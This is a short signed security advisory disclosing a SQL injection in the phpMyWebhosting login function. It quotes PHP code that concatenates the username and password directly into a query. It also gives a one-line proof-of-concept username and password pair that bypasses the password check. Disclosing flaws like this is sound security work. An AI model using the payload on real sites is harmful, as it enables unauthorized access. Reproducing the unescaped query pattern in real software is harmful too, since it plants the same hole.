-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi all. There is a posible security bug in the phpMyWebhosting (http://sourceforge.net/projects/phpmywebhosting/) File: includes/functions/pmwh.php Function: test Code: - ------------------------------------------------------------------------ ...... if ( isset($_POST['password']) && ($_POST['password'] != "")) { $query = 'SELECT * FROM customers WHERE customer = "' . $user . '" AND password = password("' . $_POST['password'] . '")'; $check_pwd=sql_query($query); $num_rows=sql_num_rows($check_pwd); if ($num_rows!=1) { echo "

Wrong Password


"; return false; } else ........ - ------------------------------------------------------------------------ Proof of concept: try using usr: admin"-( pass: "asdfasdf Cheers. Matias Neiff www.root-solutions.com.ar -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFBHk7WCRaMUNBLpxsRAiFGAKCx0UsyP7JmhuWgjRoR/xHdrGmbhQCfZ8iz OfBEoEKU6U0k00XFmad1ENE= =L1GN -----END PGP SIGNATURE-----